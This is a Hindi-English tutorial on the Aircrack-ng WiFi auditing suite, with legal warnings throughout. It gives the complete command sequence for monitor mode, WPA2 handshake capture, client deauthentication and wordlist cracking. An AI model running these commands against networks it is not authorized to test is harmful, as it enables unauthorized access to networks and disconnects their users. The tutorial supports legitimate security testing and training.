Aircrack-ng एक complete WiFi security testing suite है जो wireless networks को audit करने के लिए use होता है। इसका काम है WiFi packets को capture करना, monitor करना, और WEP/WPA/WPA2 keys को crack करना।
👉 केवल authorized networks पर ही test करो! बिना permission किसी भी WiFi को hack करना illegal है।
🔍 Aircrack-ng क्या-क्या कर सकता है
WiFi Monitoring
WiFi traffic monitor करना (airodump-ng)
WEP Cracking
WEP encryption crack करना
WPA/WPA2 Cracking
WPA/WPA2 password crack करना (wordlist attack)
Packet Capture
WiFi packets को capture करना (.cap file)
Deauthentication
Users को disconnect करना (aireplay-ng)
Fake AP
Fake WiFi access point create करना
⚙️ Kali Linux / Termux में Aircrack-ng Install
System Update
apt updateInstall Aircrack-ng
apt install aircrack-ng⚠️ Termux पर: Extra packages भी install करने पड़ सकते हैं
💻 Basic Commands (Use)
👉 Wireless interface को monitor mode में रखना ज़रूरी है:
Kill interfering processes
airmon-ng check killStart monitor mode (e.g., wlan0)
airmon-ng start wlan0Scan nearby WiFi networks
airodump-ng wlan0monCapture packets from specific BSSID
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w capture wlan0monCrack WPA/WPA2 using wordlist
aircrack-ng -w wordlist.txt capture-01.capStop monitor mode
airmon-ng stop wlan0mon🔐 Real Example: WPA2 Handshake Capture
airodump-ng wlan0mon👉 Note कर लो: BSSID, Channel, और ESSID (network name)
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w handshake wlan0mon👉 Wait करो: जब कोई device connect होगा, तो handshake capture हो जाएगा
aireplay-ng -0 5 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0mon⚠️ Legal Warning: यह command केवल अपने authorized test network पर ही use करो
🧠 इसका मतलब:
✅ Success!
WPA2 handshake capture हो गया, अब crack कर सकते हो
👉 Next Step: अब wordlist से password crack करो:
aircrack-ng -w wordlist.txt handshake-01.cap🛠️ Aircrack-ng Tools Breakdown
airmon-ng
Monitor mode manage करना
airodump-ng
WiFi packets capture करना
aireplay-ng
Packet injection और deauth
aircrack-ng
WEP/WPA keys crack करना
WiFi hacking tools का unauthorized use criminal offense है!
🔒 Legal Use Cases:
- अपना home network audit करना
- Authorized client networks test करना
- Educational/Training labs में practice
🚫 NEVER: बिना permission किसी भी दूसरे की WiFi को hack करने की कोशिश मत करो
🧩 Related Tools
Kismet
WiFi detector और sniffer
Wifite
Automated WiFi cracker
Reaver
WPS PIN attack tool
Wash
WPS enabled networks finder
Aircrack-ng = "WiFi Security Swiss Army Knife"
इसमें सब कुछ है — monitoring, capturing, deauth, cracking। यह WiFi security testing का complete package है।